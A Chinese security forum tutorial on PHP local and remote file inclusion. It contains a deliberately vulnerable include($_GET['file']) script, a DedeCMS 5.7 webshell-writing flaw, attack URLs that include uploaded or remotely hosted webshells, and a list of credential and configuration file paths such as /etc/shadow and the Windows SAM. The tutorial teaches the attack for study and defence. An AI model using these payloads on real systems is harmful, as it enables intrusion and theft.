Web安全之走进文件包含的世界

2016-08-11  本文已影响111人  池寒

来源:http://bbs.ichunqiu.com/thread-9817-1-1.html?from=ch

社区:i春秋

时间:2016年8月9日22:42:00

作者:LoneliNess

前言

俗话说:“知己知彼,方能百战不殆”,今天,小编就带着你们走进文件包含的世界,去进一步的了解它,深入它……………….如有错误,请你雅正!!

目录

第一节初识文件包含漏洞

·      1.1、 什么是包含

·      1.2、 文件包含漏洞是怎样产生的

·      1.3、 文件包含漏洞的分类

第二节  详解PHP文件包含漏洞

·       1.4、解析PHP文件包含

·       1.5、文件包含实例及漏洞分析

·       1.6、常见的几种攻击手法

·       1.7、修复方案

第三节 严正声明

正文

第一节初识文件包含漏洞

1.1、 什么是包含

程序猿常常把可以重复利用的函数写到单文件中,在使用一些函数时,直接调用,无须再次编写,这种过程呢,就称为包含

1.2、   文件包含漏洞是怎样产生的

程序猿为了让代码更灵活,会设置一些变量,用来动态调用,由于这种灵活,使客户端阔以调用一个恶意的文件,从而造成文件包含漏洞

1.3、   文件包含漏洞的分类

文件包含漏分为本地文件包含(Local File Inclusion)程文件包含(Remote FileInclusion)

第二节  文件包含漏洞实例及常见的几种攻击手法

1.4、   解析文件包含

PHP文件包含漏洞涉及到的危险函数:

include(),require()和include_once(),require_once()

以上这些函数都阔以进行文件包含,但作用不同,区别如下:

Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。

Require:找不到包含文件产生致命错误,并停止脚本

Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

Require_once:这个函数跟require的区别 跟上面我所讲的include和include_once是一样的。所以我就不重复了。

1.5、   文件包含实例及漏洞分析

1)文件包含实例

本次测试,服务器环境为:

PHP  5.3.29

Mysql  5.0.8

Apache 2.4.18

1 本地文件包含(LFI)

小编写了一个test.php文件

[AppleScript]纯文本查看复制代码

?

1

2

3

4

5

if(isset($_GET['file'])){

$file=$_GET['file'];

include $file;}

?>

然后在写包含了一个phpinfo.txt进入文件内容是符合PHP语法的代码

[AppleScript]纯文本查看复制代码

?

1

2

3

phpinfo();

?>

之后的效果如图所示

2 远程文件包含(RFI)

小编在这里须强调的是远程文件包含,必须要确定PHP开启了远程包含功能选项,开启此功能须在PHP.ini配置文件中修改,成功后重启服务器生效

即allow_url_include=on

实例如下:

www.xxxcom目录下存在1.txt,代码如下(PS:没有丝毫骂蛋总的意思):

[AppleScript]纯文本查看复制代码

?

1

2

3

echo"yyyxy is a bad man"

?>

在test.php中代码如下:

[AppleScript]纯文本查看复制代码

?

1

2

3

4

5

if(isset($_GET['file'])){

$file=$_GET['file'];

include $file;}

?>

访问url:http://www.xxxcom/test.php?file=http://localhost/1.txt

2漏洞实例分析

就拿Dedecms5.7 来讲解吧(PS:想听更好的讲解可以去i春秋官网学习)

i春秋文件包含课程讲解地址:http://www.ichunqiu.com/course/51575

广告打得有点生硬,第一次,不好意思……..

这个漏洞主要由两个原因引起的,其中最重要的一个原因,便是开发者没有认识到Apache服务器解析文件的流程,从而导致安

装文件在安装后居然可以被继    续访问。这里接单解释下Apache解析文件的流程:

当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那    么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。

那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞

问题出在这里install/index.php.bak

[AppleScript]纯文本查看复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16[php]

else if($step==11)

{

require_once(‘../data/admin/config_update.php’);

$rmurl=$updateHost.”dedecms/demodata.{$s_lang}.txt”;

echo $rmurl;

$sql_content=file_get_contents($rmurl);

$fp=fopen($install_demo_name,’w’);

if(fwrite($fp,$sql_content))

echo ‘  [√] 存在(您可以选择安装进行体验)’;

else

echo ‘  [×] 远程获取失败’;

unset($sql_content);

fclose($fp);

exit();

[/php]

了解Dedecms参数机制的同学都知道,代码中的一些变量我们是可以通过GET参数的方式进行操控的。那么上面代码很明显,可以向指定的文件内写入任意内容,从而导致获取webshell

如果想听更详细的讲解请到http://www.ichunqiu.com/course/51575

1.6、   常见的几种攻击手法

1)       本地包含配合上传拿shell

大多数网站都会有上传功能,上传个图片,假设已上传图片一句话木马,路径为xxx/1.jpg,访问http://www.xxx.com/index.php?file=./xxx/1.jpg

2)       远程包含拿shell

这种应该非常少见了吧,目标主机必须保证allow_url_include=on情况,在http://***.com/根目录下有一个一句话木马的txt,访问http://www.xxx.com/index.php?file=http://***.com/muma.txt

3)读取敏感信息

访问url:http://www.xxx.com/index.php?file=/etc/my.conf

如果存在本文件,他会读出文件的内容……..反之

常见的敏感信息路径

Windows系统

c:\boot.ini                                                                  // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml               //  IIS配置文件

c:\windows\repair\sam                                              //  存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my,ini                                     //  MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD             //  MySQL root

c:\windows\php.ini                                                    //   php 配置信息

c:\windows\my.ini                                                     //   MySQL 配置文件

......

Linux/Unix系统

/etc/passwd                                                                  //  账户信息

/etc/shadow                                                                  //  账户密码文件

/usr/local/app/apache2/conf/httpd.conf                          //   Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf        //   虚拟网站配置

/usr/local/app/php5/lib/php.ini                                        //  PHP相关配置

/etc/httpd/conf/httpd.conf                                              //   Apache配置文件

/etc/my.conf                                                                 //   mysql 配置文件

1.7、  修复方案

限制路径,禁止跳转字符,如:../

把需要包含的页面固定写好,如:include(“test.php”)

第三节 严正声明

本文讨论的技术仅用于研究学习技术交流,严禁用于非法行为和破坏行为,否则造成的一切法律责任与作者以及本网站无关。

本文原创作者:LoneliNess,转载须注明来自i春秋社区(BBS.ichunqiu.com)

结束语:

I春秋,你值得拥有!!不忘初心,方得始终!!!

上一篇下一篇

猜你喜欢

热点阅读